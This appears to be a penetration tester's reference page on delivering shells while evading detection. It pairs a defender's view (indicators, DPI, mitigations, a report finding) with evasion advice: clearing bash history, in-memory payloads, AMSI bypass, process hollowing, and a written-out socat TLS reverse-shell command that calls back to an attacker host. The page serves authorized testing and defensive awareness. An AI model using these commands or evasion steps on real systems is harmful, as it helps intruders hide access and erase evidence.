🛡️ Methodology Checklist
- Review MITRE ATT&CK T1059 (Command Scripting), T1105 (Ingress Tool Transfer)
- Identify shell delivery vector and apply OPSEC considerations
- Avoid writing payloads to disk when possible (in-memory execution)
- Use encrypted channels (HTTPS) to evade network detection
- Rename binaries, rename scripts to benign names
- Clean up dropped files, clear bash history (
history -c; history -w) - Document all payloads used for report deconfliction
🎯 Operational Context
Use when: Planning shell delivery for a target with active EDR — understand what Blue Team sees to select the least-detectable approach. Think Dumber First: Unencrypted netcat reverse shells appear as plaintext TCP streams — any DPI device catches them. Use encrypted shells (socat TLS, MSF HTTPS) on monitored networks. Shell spawned by web process (Apache→bash) is a signature IOC — consider process injection instead. Skip when: Lab environment with no monitoring — skip evasion overhead and use simplest working shell.
⚡ Tactical Cheatsheet
| Indicator | Detection Method | Context |
|---|---|---|
| File upload anomaly | App logs, web root file monitoring | www-data creating files in /var/www/html |
| Service account spawning shell | EDR process monitoring | iis apppool spawning cmd.exe or powershell.exe |
| User recon commands | SIEM correlation | whoami, id, ipconfig, net user in sequence |
| Heartbeat beacons | NDR / network traffic analysis | Regular repetitive connections to external IP |
| Non-standard outbound ports | Firewall logs, IDS | Traffic on 4444, 1337, 4445 — Metasploit defaults |
| Cleartext shell traffic | Wireshark / DPI | Commands visible in TCP stream (nc, telnet) |
| Bulk GET/POST | WAF / IDS | Directory brute-forcing or data exfiltration pattern |
🔬 Deep Dive & Workflow
MITRE ATT&CK Mapping
| Tactic | Technique | Tools/Methods |
|---|---|---|
| Initial Access | Public exploit, web app vuln, misconfiguration | searchsploit, default creds, web shells |
| Execution | Run malicious code on victim | MSFvenom payloads, bash one-liners, PS scripts |
| Command & Control | Maintain communication channel | Netcat listeners, Meterpreter, bind/reverse shells |
What Defenders See — Indicators of Compromise
1. File Uploads (Web Shell Detection)
- App logs: uploads to non-standard directories
- File type mismatch:
image.pngwith PHP/ASPX content - File created in web root by web service user
2. Process Anomalies (Endpoint Detection)
- Standard users running:
whoami,id,ipconfig,net user(recon pattern) - Service accounts (
iis apppool,www-data) spawningcmd.exe,powershell.exe,bash - Users accessing SMB shares outside normal behavior
3. Network Traffic (C2 Detection)
- Beacons: Regular repetitive connections (heartbeat pattern) = C2 framework
- Non-standard ports: 4444 (MSF default), 4445, 1337 → immediately suspicious
- Cleartext commands: nc/telnet traffic shows exact commands in Wireshark
- Volume: Rapid sequential requests = directory brute-force or exfiltration
Deep Packet Inspection (DPI)
Modern firewalls (Palo Alto, Check Point) inspect Layer 7:
- Can detect Meterpreter reverse TCP even on port 443
- Port 80/443 traffic that isn’t HTTP/HTTPS gets flagged
- Unencrypted nc shells show commands in plaintext —
net user hacker /addis visible in raw packet capture
Mitigation Strategies (Defensive Reference)
| Control | Defense | Attacker Implication |
|---|---|---|
| Application Sandboxing | Web server in container/chroot | Initial shell = limited to www-data in jail |
| Least Privilege | Services run as restricted users | Must privilege escalate after getting shell |
| DMZ Segmentation | Web servers isolated from LAN | Pivot required to reach internal network |
| Egress Filtering | Block outbound non-standard ports | Reverse shells on 4444 fail; use 80/443/53 |
| Windows Defender | Real-time protection enabled | Payloads need encoding or obfuscation |
| ScriptBlock Logging | PS command logging | PowerShell activity audited |
”Why Did My Shell Die?” Checklist
- AV killed it? → Payload deleted on disk (try fileless IEX or encode)
- Bind shell blocked? → Inbound firewall dropping the port (switch to reverse)
- Reverse shell blocked? → Egress filtering on port 4444 (use 80, 443, or 53)
- AMSI blocked PS? → Script block executed but AMSI killed it (AMSI bypass needed)
- Port conflict? → MSF handler can’t bind — check active listeners
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Shell detected immediately by EDR | Default nc/bash signatures | Encrypt: socat openssl-connect:[LHOST]:[LPORT],verify=0 exec:/bin/bash,pty,setsid,sigint |
| Process parent chain reveals injection | apache→bash is an IOC | Use process hollowing or spawn from cmd.exe to blend with normal process trees |
| Network DPI blocking reverse shell | Plain TCP detected | Use HTTPS C2 (MSF with windows/meterpreter/reverse_https); port 443 typically allowed |
| AV flags msfvenom payload on disk | Static signature | Reflective load in memory; use Donut or Cobalt Strike’s sRDI for in-memory execution |
| Shell disconnects after short time | Session timeout/keepalive | Add keepalive: MSF set SessionCommunicationTimeout 0; socat add ,keepalive |
📝 Reporting Trigger
Finding Title: Encrypted Reverse Shell Evades Network Detection Impact: TLS-encrypted reverse shells transmitted over port 443 are indistinguishable from HTTPS traffic at the network level, bypassing DPI-based IDS/IPS and network monitoring tools. Root Cause: Network monitoring lacks endpoint context to correlate encrypted sessions with process behavior. No EDR deployed to detect process spawn chains. Recommendation: Deploy endpoint EDR with behavioral analytics. Implement network traffic analysis that correlates process context with connections. Monitor for unexpected TLS connections from server processes. Use process parent-child monitoring.